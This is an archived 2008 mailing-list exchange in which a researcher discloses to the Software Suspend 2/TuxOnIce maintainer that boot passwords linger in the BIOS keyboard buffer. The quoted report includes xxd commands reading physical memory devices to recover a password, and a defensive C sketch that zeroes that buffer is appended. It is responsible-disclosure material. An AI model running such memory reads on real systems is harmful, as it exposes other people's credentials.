From: Jonathan Brossard <jonathan@iviztechnosolutions.com>
To: Nigel Cunningham <ncunningham@crca.org.au>
Cc: ncunningham@users.sourceforge.net, chabaud@users.sourceforge.net,
bernardb@users.sourceforge.net, seasons@users.sourceforge.net,
techteam@ivizindia.com,
"cer >> \"CERT(R) Coordination Center\"" <cert@cert.org>,
mhfl@users.sourceforge.net,
linux-pm <linux-pm@lists.linux-foundation.org>,
Jonathan Brossard <jonathan@ivizindia.com>
Subject: Re: Vulnerability in Software Suspend 2 (all versions)
Date: Mon, 28 Jul 2008 14:26:08 +0530
Message-ID: <488D89A8.2050101@iviztechnosolutions.com>
In-Reply-To: <1217235150.8430.119.camel@nigel-laptop>
Dear Nigel,
>Why do you think I'm in Switzerland? I'm actually a New Zealander,
>living in Australia.
Nothing against Aussies, the project was once upon a time hosted at the federal school
of Lausanne, which afaik is in Switzerland...
>Okay. As mentioned in the previous reply, I don't think this is a bug
>with TuxOnIce itself. If a BIOS data area needs clearing during resume,
>I would suggest that something like the ACPI device driver should be
>doing that, because if the memory needs clearing, it should need
>clearing irrespective of whether you've hibernated or not.
Ok. I gave you the exploit. I gave you the explanation. I gave you the fix.
Now, if you don't want to face the truth that you have a problem (why don't
you just test the exploit ?) because you don't know how to use the BIOS API
safely, that's fine : don't fix it, I don't really care.
Between : Can I quote you at my Defcon presentation ?
Regards,
Jonathan-
Nigel Cunningham wrote:
> Hi.
>
> On Mon, 2008-07-28 at 14:13 +0530, Jonathan Brossard wrote:
>
>> Hi Nigel,
>>
>> Sorry for assuming (wrongly) that ppl in Switzerland all speak French ;)
>>
>
> Why do you think I'm in Switzerland? I'm actually a New Zealander,
> living in Australia.
>
>
>> In a nutshell, I discovered a new class of vulnerabilities that I will fully
>> disclose at the Defcon security conference in August. It happens to
>> affect your software, which I would like to help you fix before I go
>> public. (Note : I have used your patch for quite a time, thanks for
>> the good job ;)
>>
>> The problem lies in a lack of sanitization of the Bios Data Area
>> after reading the password using BIOS interruptions (you don't
>> have much choice at that early stage regarding the API anyway).
>> Once the password is read, it remains in RAM for ever, and can
>> be retrieved by a (somehow) privileged user :
>>
>> root@blackbox:~# xxd -l 32 -s 0x041e /dev/mem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~# xxd -l 32 -s 0x41e /dev/oldmem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~# xxd -l 32 -s 0x041e /dev/.static/dev/mem
>> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~# xxd -l 32 -s 0x141e /proc/kcore
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~# xxd -l 32 -s 0x141e /dev/core
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~# xxd -l 32 -s 0x141e /dev/.static/dev/core
>> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420 p.4.s.s.w.0.r.d
>> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000 ................
>> root@blackbox:~#
>>
>>
>> The patch was made against the latest vanilla kernel and checked
>> under gentoo 2006 and Ubuntu Gutsy. It *should* work even if you
>> don't have a standard 3Go/1Go user/kernel split. It simply sanitizes
>> the RAM areas in question.
>>
>> Like I mentioned previously, I would appreciate credits. If you choose
>> to credit us for our work, you can quote :
>> Jonathan Brossard, endrazine@gmail.com, jonathan@ivizindia.com
>>
>>
>> Feel free to contact me if you have any additional questions or feedback :)
>>
>
> Okay. As mentioned in the previous reply, I don't think this is a bug
> with TuxOnIce itself. If a BIOS data area needs clearing during resume,
> I would suggest that something like the ACPI device driver should be
> doing that, because if the memory needs clearing, it should need
> clearing irrespective of whether you've hibernated or not.
>
> Regards,
>
> Nigel
>
>
>
--
Jonathan Brossard
Security Research Engineer
iViZ Techno Solutions Pvt. Ltd.
Mobile: +91-9748772994
Kolkata:
iViZ Technolgy Solutions(P) Ltd
c/o Erevmax Technologies (P) Ltd
DLF IT Park,
Tower-1, 12th Floor
08 Major Arterial Road
New Town, Rajarhat
Kolkata- 700 156
Kharagpur:
iViZ Techno Solutions Pvt Ltd,
School of Information Technology,
Indian Institute of Technology,
2nd Floor, Takshashila,
Kharagpur 721302 West Bengal, India.
Phone: +91-3222-282300 ext 4324
Web page: http://www.ivizindia.com
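
The sanitization the quoted report describes ("It simply sanitizes the RAM areas in question"), sketched as an added example; it is not Jonathan Brossard's patch and not TuxOnIce or kernel code. It assumes the standard PC BIOS Data Area layout (keyboard ring buffer at 0x41E, head/tail pointers at 0x41A/0x41C) and runs on a constructed in-memory copy of low memory filled with the bytes from the xxd output above; the function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Standard PC BIOS Data Area layout, physical addresses (assumed, not from the patch). */
#define BDA_KBD_HEAD 0x41A  /* 16-bit offset from segment 0x40: next key to read */
#define BDA_KBD_TAIL 0x41C  /* 16-bit offset from segment 0x40: next free slot   */
#define BDA_KBD_BUF  0x41E  /* ring of 16 entries, each {ASCII byte, scancode}   */
#define BDA_KBD_LEN  32

/* Count ring slots that still hold a keystroke (either byte non-zero). */
int bda_kbd_residue(const uint8_t *lowmem)
{
    int n = 0;
    for (int i = 0; i < BDA_KBD_LEN; i += 2)
        if (lowmem[BDA_KBD_BUF + i] || lowmem[BDA_KBD_BUF + i + 1])
            n++;
    return n;
}

/* Zero the ring and mark it empty: head == tail == 0x1E (little-endian). */
void bda_kbd_sanitize(uint8_t *lowmem)
{
    memset(lowmem + BDA_KBD_BUF, 0, BDA_KBD_LEN);
    lowmem[BDA_KBD_HEAD] = 0x1E; lowmem[BDA_KBD_HEAD + 1] = 0x00;
    lowmem[BDA_KBD_TAIL] = 0x1E; lowmem[BDA_KBD_TAIL + 1] = 0x00;
}

/* Constructed stand-in for the first 0x500 bytes of physical memory,
   holding the 32 bytes shown at 0x41e in the quoted xxd output. */
uint8_t *sample_lowmem(void)
{
    static uint8_t mem[0x500];
    static const uint8_t dump[BDA_KBD_LEN] = {
        0x70,0x19,0x34,0x05,0x73,0x1f,0x73,0x1f,0x77,0x11,0x30,0x0b,
        0x72,0x13,0x64,0x20,0x0d,0x1c,0x0d,0x1c };  /* remaining bytes are zero */
    memset(mem, 0, sizeof mem);
    memcpy(mem + BDA_KBD_BUF, dump, BDA_KBD_LEN);
    return mem;
}

int main(void)
{
    uint8_t *mem = sample_lowmem();
    printf("before: %d slots hold keystrokes\n", bda_kbd_residue(mem));
    bda_kbd_sanitize(mem);
    printf("after:  %d slots hold keystrokes\n", bda_kbd_residue(mem));
    return 0;
}
```
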